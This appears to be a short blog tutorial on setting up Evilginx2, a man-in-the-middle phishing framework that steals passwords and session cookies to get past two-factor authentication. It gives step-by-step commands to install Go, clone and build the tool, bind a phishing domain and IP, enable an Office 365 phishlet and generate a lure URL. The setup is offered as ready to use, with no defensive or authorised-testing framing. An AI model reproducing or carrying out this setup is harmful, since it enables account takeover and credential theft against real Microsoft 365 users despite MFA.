Evilginx is a man-in-the-middle exploit platform that is used to phish passwords as well as session cookies, which may eventually be used to circumvent 2-factor authentication security.

EvilnGinx is considered a sophisticated tool because it can bypass two-factor authentication (2FA) and multi-factor authentication (MFA) mechanisms. This is done by intercepting the user’s session after they have successfully logged in and then redirecting them to a fake page where their session is hijacked.

The framework may employ phishlets to mimic a website and deceive visitors into entering credentials, such as Office 365, Citrix, or Netflix. Because it is open source, there are several phishlets that are ready to use.

Requierements

  • Domain Name
  • VPS – Debian 10
  • IP Address
sudo apt update
sudo apt install wget git make -y

Install Go

wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh

Install Evilginx

git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
sudo make install

Configuration Files

Start Evilginx2

sudo evilginx
Evilginx2 phishlets
Evilginx2 phishlets

How to Configure Evilginx

config domain <yourdomain>
config ip <yourIP>
blacklist unauth

Phishlets

phishlets hostname o365 <yourdomain>
phishlets enable o365

Lures

lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0

Categorized in: